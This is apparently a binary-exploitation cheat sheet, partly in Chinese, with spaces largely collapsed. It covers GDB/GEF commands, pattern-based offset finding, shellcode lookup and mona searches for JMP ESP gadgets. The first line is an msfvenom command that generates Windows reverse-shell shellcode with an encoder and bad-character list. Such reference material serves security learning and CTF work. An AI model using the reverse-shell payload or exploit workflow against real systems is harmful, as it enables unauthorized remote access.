msfvenom/pwindows/shell_reverse_tcpLHOST=<IP>LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
GDB
安装
apt-getinstallgdb
参数
-q# No show banner-x<file># Auto-execute GDB instructions from here-p<pid># Attach to process
指令
run# Executestart# Start and break in mainn/next/ni# Execute next instruction (no inside)s/step/si# Execute next instructionc/continue# Continue until next breakpointpsystem# Find the address of the system functionset $eip =0x12345678# Change value of $eiphelp# Get helpquit# exit# Disassembledisassemblemain# Disassemble the function called maindisassemble0x12345678# Disassemble taht addresssetdisassembly-flavorintel# Use intel syntaxsetfollow-fork-modechild/parent# Follow child/parent process# Breakpointsbrfunc# Add breakpoint to functionbr*func+23br*0x12345678del<NUM># Delete that number of breakpointwatchEXPRESSION# Break if the value changes# infoinfofunctions-->Infoabountfunctionsinfofunctionsfunc-->Infoofthefuntioninforegisters-->Valueoftheregistersbt# Backtrace Stackbtfull# Detailed stackprintvariableprint0x87654321-0x12345678# Caculate# x/examineexamine/<num><o/x/d/u/t/i/s/c><b/h/w/g> dir_mem/reg/puntero# Shows content of <num> in <octal/hexa/decimal/unsigned/bin/instruction/ascii/char> where each entry is a <Byte/half word (2B)/Word (4B)/Giant word (8B)>x/o0xDir_hexx/2x $eip # 2Words from EIPx/2x $eip -4# $eip - 4x/8xb $eip # 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)ireip# Value of $eipx/wpointer# Value of the pointerx/spointer# String pointed by the pointerx/xw&pointer# Address where the pointer is locatedx/i $eip # Instructions of the EIP
helpmemory# Get help on memory commandcanary# Search for canary value in memorychecksec#Check protectionspsystem#Find system function addresssearch-pattern"/bin/sh"#Search in the process memoryvmmap#Get memory mappingsxinfo<addr># Shows page, size, perms, memory area and offset of the addr in the pagememorywatch0x7840000x1000byte#Add a view always showinf this memorygot#Check got tablememorywatch $_got()+0x185#Watch a part of the got table# Vulns detectionformat-string-helper#Detect insecure format stringsheap-analysis-helper#Checks allocation and deallocations of memory chunks:NULL free, UAF,double free, heap overlap#Patternspatterncreate200#Generate length 200 patternpatternsearch"avaaawaa"#Search for the offset of that substringpatternsearch $rsp #Search the offset given the content of $rsp#Shellcodeshellcodesearchx86#Search shellcodesshellcodeget61#Download shellcode number 61#Dump memory to filedumpbinarymemory/tmp/dump.bin0x2000000000x20000c350#Another way to get the offset of to the RIP1-PutabpafterthefunctionthatoverwritestheRIPandsendappaterntoovwerwriteit2-ef➤ifStacklevel0,frameat0x7fffffffddd0:rip=0x400cd3; savedrip=0x6261617762616176calledbyframeat0x7fffffffddd8Arglistat0x7fffffffdcf8,args:Localsat0x7fffffffdcf8,Previousframe's sp is 0x7fffffffddd0Saved registers:rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8gef➤ pattern search 0x6261617762616176[+] Searching for '0x6261617762616176'[+] Found at offset 184 (little-endian search) likely
!monamodules#Get protections, look for all false except last one (Dll of SO)!monafind-s"\xff\xe4"-mname_unsecure.dll#Search for opcodes insie dll space (JMP ESP)
IDA
在远程 Linux 中调试
在 IDA 文件夹中,您可以找到可以用于在 Linux 中调试二进制文件的二进制文件。要做到这一点,将二进制文件 linux_server 或 linux_server64 移动到 Linux 服务器中,并在包含该二进制文件的文件夹中运行它: